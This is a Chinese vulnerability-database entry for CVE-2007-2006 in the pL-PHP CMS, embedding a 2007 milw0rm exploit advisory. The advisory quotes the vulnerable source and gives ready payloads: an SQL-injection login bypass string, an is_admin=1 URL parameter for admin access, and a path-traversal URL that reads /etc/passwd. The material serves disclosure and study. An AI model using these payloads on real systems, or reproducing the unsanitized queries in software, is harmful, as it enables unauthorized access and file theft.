pL-PHP 'login.php'多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112670 漏洞类型 SQL注入
发布时间 2007-04-10 更新时间 2007-04-12
CVE编号 CVE-2007-2006 CNNVD-ID CNNVD-200704-241
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3704
https://www.securityfocus.com/bid/81834
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-241
|漏洞详情
pL-PHP的login.php中存在多个SQL注入漏洞。远程攻击者可以借助(1)login或(2)pass参数,执行任意的SQL指令。
|漏洞EXP
.      .        .  
._ | _.  .|_  _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
|      ._|            
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
	by Omni

1) Infos
---------
Date            : 2007-04-10
Product         : pL-PHP
Version         : beta 0.9 - Prior version maybe also be affected
Vendor          : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status   : 2007-04-10 -> Not Informed!

Description     : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,                      
		  with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics                   
		  and sub-topics. It will be very easy to use.

Source          : omnipresent - omni
E-mail          : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team            : Playhack.net Security

2) Security Issues
-------------------
--- [ SQL Injection - Admin Access Bypass ] ---
===============================================

[login.php Source Code Bugged - Line 10 - 20]

require("includes/config.php");

// Authentification
// Script inspiré par DBprotect 1.0 de David Borrat (david@borrat.net)
if (isset($_POST['login'])) {
	$login = $_POST['login'];
	$pass = md5($_POST['pass']);
	
$sql = mysql_connect($global['sql_host'], $global['sql_user'], $global['sql_pass']);
mysql_select_db($global['sql_base'], $sql);
$verif_query = sprintf("SELECT * FROM " . $global['prefix'] . "_users WHERE username='$login' AND user_password='$pass'");

[end login.php Source Code]

As we can see the variables $login and $pass are not properly sanitized before being used; so is possibile to exploit this vulnerability remotely.

[ PoC ]
=======

Just run with your browser to login.php and insert in the login field: 1' OR '1' = '1' # and in the pass filed what you want! Now you have Admin credential!

--- [Global Variable problem - Admin Access Bypass ] ---
========================================================

[admin.php Source Code Bugged - Line 14]

[...]

if($is_admin == 1)

[...]

[end admin.php Source Code]

As we can se, via the browser we can just connect to admin.php script and pass the variable isadmin the number 1 :D.

[ PoC ]
=======

http://remote_host/[remote_path]/admin.php?is_admin=1

Now you are Admin ;)

--- [Local File Inclusion ] ---
===============================

[admin.php Source Code Bugged - Line 16]

[...]

include("admin/lang/" . $lang . ".inc.php");

[...]

[end admin.php Source Code]

As we can se, via the browser we can just connect to admin.php script and pass the variable $lang a pretty good path ;).

[ PoC ]
=======

Connect with Admin Credential and... Have fun..

eg 1:

http://127.0.0.1/files/admin.php?is_admin=1&lang=../../../../../../etc/passwd%00

eg 2:

First you must.. log in as Admin (SQL Injection Method) and then...

http://127.0.0.1/files/admin.php?&lang=../../../../../../etc/passwd%00

3) Patches
-----------

Edit the source code to ensure that the input will be properly sanitized before being used

# milw0rm.com [2007-04-10]
|受影响的产品
pL-PHP pL-PHP 0.9 Beta
|参考资料

来源:MILW0RM
名称:3704
链接:http://www.milw0rm.com/exploits/3704
来源:BUGTRAQ
名称:20070411pL-PHPbeta0.9-MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/465340/100/0/threaded
来源:VUPEN
名称:ADV-2007-1352
链接:http://www.frsirt.com/english/advisories/2007/1352